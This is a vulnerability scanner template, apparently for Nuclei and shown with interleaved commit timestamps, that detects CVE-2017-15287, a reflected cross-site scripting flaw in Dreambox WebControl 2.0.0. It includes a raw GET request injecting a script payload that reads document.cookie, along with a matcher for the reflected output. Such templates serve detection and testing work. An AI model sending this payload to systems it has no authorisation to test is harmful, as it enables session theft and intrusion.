2022-01-15 20:35:33 +00:00
id : CVE-2017-15287
info :
2022-04-29 19:58:07 +00:00
name : Dreambox WebControl 2.0.0 - Cross-Site Scripting
2022-01-15 20:35:33 +00:00
author : pikpikcu
severity : medium
2022-04-29 19:58:07 +00:00
description : |
Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
2023-09-06 13:22:34 +00:00
remediation : |
Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks.
2022-04-22 10:38:41 +00:00
reference :
- https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
- https://www.exploit-db.com/exploits/42986/
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-15287
2022-01-15 20:36:52 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-01-15 20:36:52 +00:00
cve-id : CVE-2017-15287
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.00129
2023-10-17 17:52:26 +00:00
epss-percentile : 0.47258
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : bouqueteditor_project
product : bouqueteditor
2023-09-06 13:22:34 +00:00
framework : dreambox
2023-07-11 19:49:27 +00:00
tags : dreambox,edb,cve,cve2017,xss
2022-01-15 20:35:33 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-15 20:35:33 +00:00
- raw :
- |
GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers :
- type : word
words :
- 'Unknown command : <script>alert(document.cookie)</script>'